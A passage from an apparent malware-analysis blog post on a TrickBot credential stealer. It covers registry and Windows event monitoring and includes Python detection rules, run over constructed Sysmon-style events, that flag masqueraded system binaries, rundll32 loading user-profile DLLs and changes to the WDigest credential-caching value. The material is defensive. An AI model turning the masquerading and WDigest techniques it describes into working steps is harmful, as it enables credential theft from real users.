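        print(" ", r["url"], r["user"], r["secret_redacted"])
```

The records list is what to hand to the affected users: which site, which account, and whether a secret actually left the machine (the first line above, like the first line in the captured packet, carries a user name but an empty password field).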

Persistence in a system establishes a foundation for malware to stay where it is and continue to send data. For this reason, we monitor certain registry entries. One of them is –

HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential

The reason for this is obvious: we want to know who and what logs in and out of the machine.

In our logs we see the following which we are alerted to:

It is not a coincidence that we then are alerted to the following:

This is Event ID 4634. The time of the registry being accessed is 17:34:16.145. The above event for the logoff occurs at 17:35:28.302. Note the below:

The process ID that accessed the registry to begin with was Process ID 6732, which was created by wermgr.exe, and we were alerted to this earlier.

It is therefore no coincidence that while this malady was running the user account was logged off, which is quite alarming yet fascinating to witness.
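Every alert in Section II is a simple predicate over one event: a DLL path under \Users on a rundll32 command line, a Windows binary name outside \Windows, wermgr.exe with a child, a 4670 on an executable in Roaming, a 5156 to a port nobody approved, a write to the WDigest value. The following is an added example, not the Elastic or Sysmon configuration the article runs, of those predicates written as Python rules over Sysmon-style event records; the event shape, the user name "victim", the exact paths and the 203.0.113.x addresses are constructed placeholders, while the binary names, ArtPress, port 8082 and the registry key are the page's.

```python
import re

# Constructed events in the shape of the Sysmon and Windows audit records discussed
# above: rundll32 with a DLL in the profile, wermgr.exe -> svchost.exe under
# Roaming\ArtPress, the 4670 ACL change, the 5156 connection on 8082, the WDigest
# value.  "victim", the exact paths and 203.0.113.x are placeholders.
SAMPLE_EVENTS = [
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"rundll32.exe C:\Users\victim\AppData\Roaming\sppcommpatch.dll,Start"},
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\wermgr.exe",
     "parent_image": r"C:\Windows\System32\rundll32.exe", "command_line": "wermgr.exe"},
    {"event": "ProcessCreate", "image": r"C:\Users\victim\AppData\Roaming\ArtPress\svchost.exe",
     "parent_image": r"C:\Windows\System32\wermgr.exe", "command_line": "svchost.exe"},
    {"event": "PermissionChange", "object": r"C:\Users\victim\AppData\Roaming\ArtPress\svchost.exe",
     "image": r"C:\Windows\System32\wermgr.exe"},
    {"event": "NetworkConnect", "image": r"C:\Users\victim\AppData\Roaming\ArtPress\svchost.exe",
     "dst_ip": "203.0.113.5", "dst_port": 8082},
    {"event": "RegistryValueSet", "image": r"C:\Users\victim\AppData\Roaming\ArtPress\svchost.exe",
     "target": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "details": "DWORD (0x00000001)"},
    {"event": "NetworkConnect", "image": r"C:\Program Files\Browser\browser.exe",   # benign control
     "dst_ip": "203.0.113.9", "dst_port": 443},
]

WINDOWS_DIR = re.compile(r"^[a-z]:\\windows\\", re.I)
USER_PROFILE = re.compile(r"^[a-z]:\\users\\", re.I)
DLL_PATH = re.compile(r"[a-z]:\\[^\s,]+\.dll", re.I)
SYSTEM_BINARIES = {"svchost.exe", "wermgr.exe", "rundll32.exe"}
ALLOWED_PORTS = {80, 443}          # what this shop lets users out on
WDIGEST_KEY = r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential"


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_process_create(ev):
    alerts = []
    image, parent = ev["image"], ev.get("parent_image", "")
    name = basename(image)
    if name == "rundll32.exe":
        for dll in DLL_PATH.findall(ev.get("command_line", "")):
            if USER_PROFILE.match(dll):
                alerts.append("rundll32 loading a DLL from a user profile: " + dll)
    if name in SYSTEM_BINARIES and not WINDOWS_DIR.match(image):
        alerts.append("Windows binary name running outside the Windows directory: " + image)
    if name == "wermgr.exe":
        alerts.append("Windows Error Reporting started (parent %s)" % parent)
    if basename(parent) == "wermgr.exe":
        alerts.append("wermgr.exe spawned a child process: " + image)
    return alerts


def check_network_connect(ev):
    alerts = []
    if ev["dst_port"] not in ALLOWED_PORTS:
        alerts.append("outbound to %s:%d on a non-standard port from %s"
                      % (ev["dst_ip"], ev["dst_port"], ev["image"]))
    if basename(ev["image"]) in SYSTEM_BINARIES and not WINDOWS_DIR.match(ev["image"]):
        alerts.append("network connection from a misplaced system binary: " + ev["image"])
    return alerts


def check_registry_value_set(ev):
    if ev["target"].lower() == WDIGEST_KEY.lower():
        return ["WDigest UseLogonCredential changed to %s by %s" % (ev.get("details"), ev["image"])]
    return []


def check_permission_change(ev):
    obj = ev["object"]
    if USER_PROFILE.match(obj) and obj.lower().endswith(".exe"):
        return ["ACL changed on an executable in a user profile: " + obj]
    return []


RULES = {
    "ProcessCreate": check_process_create,
    "NetworkConnect": check_network_connect,
    "RegistryValueSet": check_registry_value_set,
    "PermissionChange": check_permission_change,
}


def run_rules(events):
    """Return [(event index, alert text)] for every rule that fires."""
    out = []
    for i, ev in enumerate(events):
        for alert in RULES.get(ev["event"], lambda e: [])(ev):
            out.append((i, alert))
    return out


if __name__ == "__main__":
    for i, alert in run_rules(SAMPLE_EVENTS):
        print("event %d: %s" % (i, alert))
```

The rules are deliberately single-event so each can map onto one Sysmon or audit event ID; the correlation the text does by hand (the 5156 from a process that was itself a 4670 subject, the 4634 logoff shortly after the registry write) is a second layer built on the output of these.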

Conclusion:

There is no doubt that this malware is an information / credential stealer. It was discovered at a site that is owned by a “legal professional”. This was of course running in our lab, and afterwards I uploaded the file to any.run, where we have a subscription, and sure enough, not only did we confirm a credential stealer, but we confirmed TrickBot.

When a Title Company, an Attorney, or any entity holds data that you have given to them, they have a responsibility to safeguard it. It surprises me how society is so quick to point fingers at Google and Facebook and push legislation, when governmental entities, attorneys, the courts, banks, and title companies take an incredibly lax approach to securing their data. It’s absurd and professionally offensive because even when confronted with such revelations, the level of arrogance is astounding.

So, what are we to do? Well, that is simple. Do not depend on these so-called professionals to help you; inform yourself and research — the information is out there, all you must do is ask questions. Why do you need my Social Security Number? What is your cybersecurity policy? Who do you share information with? Do you audit your employees to make sure they are not abusing the data? You need to do this, because if your identity is stolen, no one is going to help in a way that is effective.

Who is the best defense? They are partners — information and you!